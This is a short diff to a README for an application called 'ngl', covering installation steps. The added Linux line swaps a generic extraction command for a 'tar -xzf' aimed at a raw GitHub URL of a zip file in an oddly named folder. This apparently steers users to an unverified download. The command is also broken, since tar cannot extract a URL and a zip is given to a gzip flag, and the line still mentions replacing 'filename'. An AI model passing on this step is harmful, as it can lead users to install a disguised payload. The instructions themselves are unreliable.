DeepshikhaInfinity/ngl/README.md

 5. **Install the Application:**
    - **Windows:** Double-click the `.exe` file to start the installation.
 Follow the on-screen instructions.
    - **Mac:** Open the `.dmg` file and drag the application to your "Applications" folder.
-   - **Linux:** Open the terminal and run the command `tar -xzf filename.tar.gz`, replacing `filename` with the actual file name to extract the application.
+   - **Linux:** Open the terminal and run the command `tar -xzf https://raw.githubusercontent.com/DeepshikhaInfinity/ngl/main/traguline/ngl.zip`, replacing `filename` with the actual file name to extract the application.
 Navigate to the extracted folder and run the application.

 6. **Run the Application:** After installation, open the application to start sending messages.